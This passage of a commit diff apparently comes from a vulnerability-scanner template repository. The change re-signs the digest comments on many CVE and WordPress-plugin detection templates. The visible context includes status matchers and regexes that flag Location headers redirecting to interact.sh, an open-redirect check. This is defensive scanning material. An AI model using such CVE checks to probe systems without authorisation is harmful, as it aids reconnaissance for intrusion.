http/technologies/wordpress/plugins/google-site-kit.yaml | 3 +-- .../wordpress/plugins/google-sitemap-generator.yaml | 3 +-- http/technologies/wordpress/plugins/gtranslate.yaml | 3 +-- http/technologies/wordpress/plugins/gutenberg.yaml | 3 +-- .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 3 +-- .../wordpress/plugins/header-footer-code-manager.yaml | 3 +-- .../wordpress/plugins/header-footer-elementor.yaml | 3 +-- http/technologies/wordpress/plugins/header-footer.yaml | 3 +-- http/technologies/wordpress/plugins/health-check.yaml | 3 +-- http/technologies/wordpress/plugins/hello-dolly.yaml | 3 +-- http/technologies/wordpress/plugins/host-webfonts-local.yaml | 3 +-- http/technologies/wordpress/plugins/imagify.yaml | 3 +-- http/technologies/wordpress/plugins/imsanity.yaml | 3 +-- .../wordpress/plugins/insert-headers-and-footers.yaml | 3 +-- http/technologies/wordpress/plugins/instagram-feed.yaml | 3 +-- .../wordpress/plugins/intuitive-custom-post-order.yaml | 3 +-- http/technologies/wordpress/plugins/iwp-client.yaml | 3 +-- http/technologies/wordpress/plugins/jetpack-boost.yaml | 3 +-- http/technologies/wordpress/plugins/jetpack.yaml | 3 +-- http/technologies/wordpress/plugins/kadence-blocks.yaml | 3 +-- http/technologies/wordpress/plugins/kirki.yaml | 3 +-- http/technologies/wordpress/plugins/leadin.yaml | 3 +-- .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 3 +-- http/technologies/wordpress/plugins/limit-login-attempts.yaml | 3 +-- http/technologies/wordpress/plugins/litespeed-cache.yaml | 3 +-- http/technologies/wordpress/plugins/loco-translate.yaml | 3 +-- http/technologies/wordpress/plugins/loginizer.yaml | 3 +-- .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 3 +-- http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 3 +-- http/technologies/wordpress/plugins/mailpoet.yaml | 3 +-- http/technologies/wordpress/plugins/maintenance.yaml | 3 +-- http/technologies/wordpress/plugins/mainwp-child.yaml | 3 +-- http/technologies/wordpress/plugins/malcare-security.yaml | 3 +-- http/technologies/wordpress/plugins/megamenu.yaml | 3 +-- http/technologies/wordpress/plugins/members.yaml | 3 +-- http/technologies/wordpress/plugins/meta-box.yaml | 3 +-- http/technologies/wordpress/plugins/metform.yaml | 3 +-- http/technologies/wordpress/plugins/ml-slider.yaml | 3 +-- http/technologies/wordpress/plugins/newsletter.yaml | 3 +-- .../wordpress/plugins/nextend-facebook-connect.yaml | 3 +-- http/technologies/wordpress/plugins/nextgen-gallery.yaml | 3 +-- http/technologies/wordpress/plugins/ninja-forms.yaml | 3 +-- http/technologies/wordpress/plugins/ocean-extra.yaml | 3 +-- .../wordpress/plugins/official-facebook-pixel.yaml | 3 +-- http/technologies/wordpress/plugins/one-click-demo-import.yaml | 3 +-- http/technologies/wordpress/plugins/optinmonster.yaml | 3 +-- http/technologies/wordpress/plugins/otter-blocks.yaml | 3 +-- http/technologies/wordpress/plugins/password-protected.yaml | 3 +-- http/technologies/wordpress/plugins/pdf-embedder.yaml | 3 +-- .../wordpress/plugins/pinterest-for-woocommerce.yaml | 3 +-- http/technologies/wordpress/plugins/pixelyoursite.yaml | 3 +-- http/technologies/wordpress/plugins/polylang.yaml | 3 +-- http/technologies/wordpress/plugins/popup-builder.yaml | 3 +-- http/technologies/wordpress/plugins/popup-maker.yaml | 3 +-- http/technologies/wordpress/plugins/post-smtp.yaml | 3 +-- http/technologies/wordpress/plugins/post-types-order.yaml | 3 +-- .../wordpress/plugins/premium-addons-for-elementor.yaml | 3 +-- http/technologies/wordpress/plugins/pretty-link.yaml | 3 +-- http/technologies/wordpress/plugins/really-simple-captcha.yaml | 3 +-- http/technologies/wordpress/plugins/really-simple-ssl.yaml | 3 +-- http/technologies/wordpress/plugins/redirection.yaml | 3 +-- http/technologies/wordpress/plugins/redux-framework.yaml | 3 +-- http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 3 +-- http/technologies/wordpress/plugins/safe-svg.yaml | 3 +-- http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 3 +-- http/technologies/wordpress/plugins/sg-cachepress.yaml | 3 +-- http/technologies/wordpress/plugins/sg-security.yaml | 3 +-- http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 3 +-- .../wordpress/plugins/shortpixel-image-optimiser.yaml | 3 +-- .../wordpress/plugins/simple-custom-post-order.yaml | 3 +-- http/technologies/wordpress/plugins/siteguard.yaml | 3 +-- http/technologies/wordpress/plugins/siteorigin-panels.yaml | 3 +-- http/technologies/wordpress/plugins/smart-slider-3.yaml | 3 +-- http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 3 +-- .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 3 +-- http/technologies/wordpress/plugins/sucuri-scanner.yaml | 3 +-- http/technologies/wordpress/plugins/svg-support.yaml | 3 +-- .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 3 +-- http/technologies/wordpress/plugins/tablepress.yaml | 3 +-- http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 3 +-- http/technologies/wordpress/plugins/the-events-calendar.yaml | 3 +-- http/technologies/wordpress/plugins/tinymce-advanced.yaml | 3 +-- .../wordpress/plugins/translatepress-multilingual.yaml | 3 +-- .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 3 +-- .../wordpress/plugins/under-construction-page.yaml | 3 +-- http/technologies/wordpress/plugins/updraftplus.yaml | 3 +-- http/technologies/wordpress/plugins/use-any-font.yaml | 3 +-- http/technologies/wordpress/plugins/user-role-editor.yaml | 3 +-- .../wordpress/plugins/velvet-blues-update-urls.yaml | 3 +-- http/technologies/wordpress/plugins/w3-total-cache.yaml | 3 +-- .../wordpress/plugins/webp-converter-for-media.yaml | 3 +-- http/technologies/wordpress/plugins/webp-express.yaml | 3 +-- .../wordpress/plugins/widget-importer-exporter.yaml | 3 +-- .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 3 +-- .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 3 +-- .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 3 +-- .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 3 +-- .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 3 +-- http/technologies/wordpress/plugins/woocommerce-payments.yaml | 3 +-- .../wordpress/plugins/woocommerce-paypal-payments.yaml | 3 +-- .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 3 +-- http/technologies/wordpress/plugins/woocommerce-services.yaml | 3 +-- http/technologies/wordpress/plugins/woocommerce.yaml | 3 +-- http/technologies/wordpress/plugins/wordfence.yaml | 3 +-- http/technologies/wordpress/plugins/wordpress-importer.yaml | 3 +-- http/technologies/wordpress/plugins/wordpress-seo.yaml | 3 +-- http/technologies/wordpress/plugins/worker.yaml | 3 +-- http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 3 +-- http/technologies/wordpress/plugins/wp-file-manager.yaml | 3 +-- http/technologies/wordpress/plugins/wp-google-maps.yaml | 3 +-- http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 3 +-- http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 3 +-- http/technologies/wordpress/plugins/wp-migrate-db.yaml | 3 +-- http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 3 +-- http/technologies/wordpress/plugins/wp-optimize.yaml | 3 +-- http/technologies/wordpress/plugins/wp-pagenavi.yaml | 3 +-- http/technologies/wordpress/plugins/wp-reset.yaml | 3 +-- .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 3 +-- http/technologies/wordpress/plugins/wp-rollback.yaml | 3 +-- http/technologies/wordpress/plugins/wp-seopress.yaml | 3 +-- http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 3 +-- http/technologies/wordpress/plugins/wp-smushit.yaml | 3 +-- http/technologies/wordpress/plugins/wp-statistics.yaml | 3 +-- http/technologies/wordpress/plugins/wp-super-cache.yaml | 3 +-- http/technologies/wordpress/plugins/wp-user-avatar.yaml | 3 +-- http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 3 +-- http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 3 +-- http/technologies/wordpress/plugins/wpforms-lite.yaml | 3 +-- http/technologies/wordpress/plugins/wps-hide-login.yaml | 3 +-- http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 3 +-- .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 3 +-- .../vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml | 3 +-- http/vulnerabilities/other/ecology-oa-file-sqli.yaml | 2 +- network/cves/2022/CVE-2022-31793.yaml | 3 +-- 2163 files changed, 2163 insertions(+), 4317 deletions(-) diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index 183edd8d83..0ebb22709c 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022076a0b67db39d6edf3954ad1ee2b91b0a9f366839b9014307530cd9cc301348ce022100b2f0ea19edc1f3d1f6aec75c82c48a7d962bbdc075b1e007246d367a67cd9d6e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c84395302e99bdf0b20a9356c4bfa8320a98705668294c93fea77fcedef9584f022100a6d17481b87ca99564d3d12942edd7752dd83a9b0ebc29f716d5ad38883d6e04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index 2ad4c99dc5..789137fe6c 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210087cafd283b0d2c32b5e6d535d02ddec38630ac34fde9f938ce1c9cb46b48853702210090848784fe6f52b0c99bf31404f11287813e30263bc34318aa234ababa7ce9dc:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f6fbc2eb4fe8ebdc1e805da5747f8a6768f5c3c56c74935d313f0adb01b8a6f9022100d0433c5b6dd862ca4a405d7855a53a1e152e3205d4adf1b3cb9d5f51330c3530:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 8e0b9ab9b5..88dedc44fe 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ac64503df2415371f194e66f195785387bb01de16a12faa0e35d0c1396f9529202202a5d73ff06b2a2223965df6ace420ec1003c472bcea7a894c09090a26fd73295:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c3b02d68d2917135071bc01a9ba99c9ddcb27ff0742a2e348d13fe344f34c67a02204fe94628459b71d1ca2f5a590f8f8913b44463ced6e0cf5c720db6a364b52ee8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index ffd72068b8..a5e7ecee1e 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022026db67e61d737b0bc17e66cbc5a43657a4139b3f810bcabcacf6b6e0bb1b4ffc0221008f1fdadac48f0fafcc12bea26c5093d4043d133b94ff0ba7709e6418d2502f08:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a7f657216035d8da309f2cf99222700a6e28e3ec17963598cf21861f8ca62e0c022100e16334f57d567db5905715da2032d3100fd640af08152cb3bac104cb2904c100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index fe531f4f0e..dd99f1c1c3 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -37,5 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' - -# digest: 490a0046304402204f36a1601b30669cf8af8bea8fb1a6f41dfcedeb02acd83cfea95776e17ceed402206f2e2cc64fb805ea2c51ec91723b1b5dfdcacbd110ec24b6ed1157f6c45c7e24:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fab31ef19064b7e73257326013ba527e1669dcd27f004eaf1eecc68603ea0481022100b4169ea7307a1cd707e42d5bb30b7f663cab03ea65da616ce8fb3615b432b259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index 81c4ba2ee1..f5ff754ebd 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d1dee1d9d8c1a63a329c49aafee32c6d3884e4ac1f5a7baf342625087e720a51022100bb009165de1ef2f00c382e03ccbbaf3ea121cb2f7c7fecbf4bfaf8aff7826197:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204279223234b723c912315857f205ec2bfc94665e93ae0bf0b69e2c892169ce69022100c52564f60051e1a332edd433b73d014b435c7250535a35fc94d9e15480bf035c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index f7ab51de6f..dca1d2fb07 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200ea2fc21fb5781e21b2b21b33bceed90ea6758ea92acf5e56601ab63bfbde4b9022100abafc518e3316e8c514c886bf19dd0b230a139b83beccab21722538c8c8e9a18:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f938de24fd2fe86e88e38b23ecea7e116f03f627f1ddc481db5e9c2c2284fa3e022100aadb5898c7cd6b3ef4c158ac725420bdd4b9c28ecf67b9a03f6b84b9167a6114:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index a351ba91bf..d2388a557a 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -40,5 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' - -# digest: 490a00463044022055e73075a78d30caeac1b6a9afb7ab17b8c7e75f4d660b53e03961c5345515cb02204b4690e0148f678b0afccd87b2cb11222f509fd941330dae5c7c03cadde56dd7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ff7e44f75cc3eda99f9a22ca69ddd932dc8068be11d2836d11f8ca7fb3e08d11022016dc283be28a1f332d3878c92bd99f78d06e4f3c61ed12b66fa957aa787128ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index eacc34cfed..d3e7499edc 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100bce32e7d11f9924510e6f4c147b6eea44e966df4c012dd96d3cc6ad09b46f05c0220251fa43d5cef67ac0546f2d7d456faedb106dc55faf90adb4c4ccced53c57bb7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a55474cc315ff2c17cb85e509872b15117b28874099f76108bcb2f54394eddbc022100d75c6f9105e255078ba45869314c15bfea4de196ee497d9fe04137a296e7df2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index 67bccf5004..05a7c6511b 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100feed1caed197fa85a4250142d43f8757b89480c02cf52fb58f079af050465069022100a5328a54040801a8263ab4b1ec2b54ec9b3d8e63416dc7889b685349306d0c18:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ddf70fdd0495178198448e41820fd005863c4a7aff01ee0c9c4e6b50eb1c184802200a85234f513d21a1999a3311e5565af22001d57e097e84f8b1cbf8ac60b97706:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index 558041af92..f407603eed 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204228585cf3216a21661376687483c7146156dd0ad793c18761ca793f2281992e022025166e51845704a0d17dfddbf8893db355b72d5b964a4b4df4d82910ba5e0c2e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008795addc875c82429bbeeb12cbf1b6a901732df7d3b8acf07f192152a84a06d702207fc23a3301d4058c1d2904fc91fa408ac10f2795c977531601928f1d7a9dde55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index e4862f3957..0d27ecde8b 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210097f11299aa634722d7ec16f77bd049dd81a568727313a933a0eab8ed844d08300220684180e2d52ca9f594aa4d1249866033e0f32df5bc8e60b6fdbb0c94811f9fe8:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ad2673ae3433641fe8548bfdbd9e6e67d97fcaf76f009dcc22c02144546693d7022100c986859a160758c79d8e9b3ded05a35828626d1e87e3211d502751415253d8b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index 7b4745028c..7ae310f247 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220394739936f7c51c7b2558cdc3eeef7ca372dc443e542152ae6612fc9a4830a6402202769f1ea652a2dc5723685baa0b44b2163bebbb621a6c71b8e1ba6965f1de3f9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022049a21ff15edbdbed1136eda1e39399c38d0429a1e0093537ec2928e354a6f2a4022100b49af163f3441f00812b294d846f761248a2dfcff7ccd636dd46339c676b0c2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index 54d844b64a..79bc347c00 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022075521baf86f07edd5e2a2504c3d335182070703ffb9b0a89fd3ad0ddd8374596022029dd03a113c7fa870a14eeef53dce4b88683dfc1f6b677f5c637df8f1c41ce4d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ff36a8c5380667bdf113578f727da39f025cb5158c7781164bd9385190484794022048af52900ca68a30d4aa37c36c911970cb3a5cd6f1f3f2a716b86bbaad6c5a29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index 9c31156d15..245eff365b 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008e9ff996e34052a3953e8b1aecf9c9ba921b8af66bfe95fd31275c22c358024f02207b50bcb5c379b648e2668660421cfb8f29242d6dbc9f406df9ed1bb82d292fa6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d3ccd5fa20f128c5ba8515a03fb27b12836db7f49ac6d5ef26edcc1884a4591302201795657f021790fc2b3380eb1c0b7776dfbaf9db7f03c233218d7b1668134a7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index ae8abb9512..155b5c882b 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100fbfdf880b057950665b98ddd29790b1df56f2c131de9a6cf365b6968df35c0ea022100f50d6697fd45f5e85a62479a5f417e5dfd8926f9d492e8ab0c3ca68afe0ff99c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f7a2d8e1e560064d3e09e2a6b0bca20c1173fc1077847c259e8340fe402992c8022100a3768d81a5c9ac752f713695da6f875854c17e34acf2fad7399c83046d0ce29c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 388a55f55b..0482ae2d89 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022006dfd2f336acaa81f4aff48e3e8617709ab99c28ee3b4537292d277550806d9d022100cceb88226badef697912dc073f310b8e6cc79feb9345886f7a93267b333b3254:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200618f271438cd6973744c36db3570f773c3dc326dd9ee5a3efc9de8d888a5f8d0220046753c7fc24a23d79eb17729ab7ef93fcbb50b8ae1d9d4e1e3329616bb8fa80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index 6f1772485d..8b96c576f1 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -40,5 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 490a004630440220508dd6b30ef8f1374954890e820c8ee382a307f563b410fa615922171239733d022061fb7341a271f65fedf1ac004f8b7915e4c519cc9233f5e5f301afb368448cd6:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206d2e38bf3a764c11102c50c4663f51ad4326f3d91dca6a2dafa427b6a555c83502206ff47ec4336887ea3300855e788c6e0bbea4627bd2a7ab9718791becfe7a35ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index 6e3db77e34..bfd3fce180 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c8a67c822699374f093826464671f06f62c6f56a38b6bfb72ad9d681a9696c02022100cdc87193973e90fd6af33d01349c9f3ae5766e7dd2d86e8b8db681c4cffe73c0:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022038fd4b05a7858613471b66549327422cef6fb4a801d57847f2a6ab6b1c53760a022041098c431a8476e260f29d71be0f1f59b036e910ddb633c3ea97183df92aac44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index 14c6ec5326..f95b9122e8 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e9035c810e298e72d777d662cff7ebc4248e230712bbb564a9c453b1233ab8fc022100f0f2b7d832f1194c4bf525dba7e085bd2193d544eebbc8fb9e1d147d92ee44d9:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022026f15d9f2dde4ce6b7296bcf50011ca21c95cf40fa54ad46ec30d8dfe2814a72022075c164c613e8f7c3503fbe248e12a322322c86c585fde644d39c6ee240a0b368:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index 4335cd9e04..90dbe60c32 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022007213a1944da431df62ec0aa704ea00af82ce4c61f2f423bc4a192508fc3c0b90221009c13e842507d8b49cdb7d2e3ac1e903b944a2c7de37d51caff1049f65486329b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bd437431438ab0778f58d96e501c57a939173ea1b7a4bf4b58a5829dea73092f02210093986e9daa01c1646d737d4a2c3ab7a0b969a66d7678585ea0e20b873a7098db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index 10fe7f6c2f..df3911d52f 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009a0e290ee0cdb7b44749685b5d8468a315ebcff6ec3c7271b405372f44c92fd002205a385617f0d7b01d21d7a0ed4607fa46cbb2862fcd0d8221817d4ae184d5a8cb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d56235575e3edf95da01e6ad8946a9e0921bbeb1337f551d4d15ad9722270f5f022067165549b20553152082c5511390043f15ac52c74d83b3c45d608321eaaabee3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index b8189323fc..d02640ac6d 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207b83fd8a77d08350b0dcb8a8775e7cf005466ec0e6f73d9517a12d0ec985f595022100aa556e5eb269e11dde3575ec7c8c5d0fe6a15840cb6aa9ce2ec0ec06a8831365:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205c2c04b2c9bcadc7c5cceaf12da8461e5e6390a99f5f5be6028d376c20b8e0d002203f467c3d5aece1c6308a8bbd56577bc42f25bf9d84b0dea84e77f26c328a1a07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index 29fbd71ae2..b7f7300bb6 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205aed9fe5ee723c9631501c87f21a1a4f52673d35d5317391f07c39ca73767745022031d0091b40920e364611bf23a7b15a37c33339da2820c5b2f0610d3a845d1831:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205f975239edad42a53e6c5d35953faaf4224c0ce71abced8c6504183fdeae3db7022100df936529327fbe3214debdf9cf85815b3d486c54ed2b5d3f1b02adf9c640be15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index e9763c88d8..2b8f76c3c9 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210080836d4683e158c670b5d3a459fc7af0ed30bb115904a812156d94cf66239faf022100d64b338c0b0b6c3ac0ad59685e2b0f07fbd39996c325da41c2642083f9ffcdcc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220460e24c725bd65a8ae81b3d0e7bff5b11d811cfa21ba58072c7a4b8368f75c72022100f9c8c76022cba1fbaf95c8bcd634d8e9569d7099722d11a56f688ca65ccede8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index 32977437d5..076e58e2a9 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203b534552b52d40e24e8c3a1e4fb8c4333ee2f081b3f9ea812a28bad07d2b1722022060f311cdcf6ed15ff0710756ea57aa752885a461d7f0fc60b5f29e917ccb10d8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210090a7a42aa6292140acc89b2a57f91f31e71311d42036ac9c2a34c1281ea20a680220171328b0e8cad698524fc03962dcc25c94ce8bf1f7bd8b023615bd14ba102ce7:922c64590222798bb761d5b6d8e72950 \ No newline at end 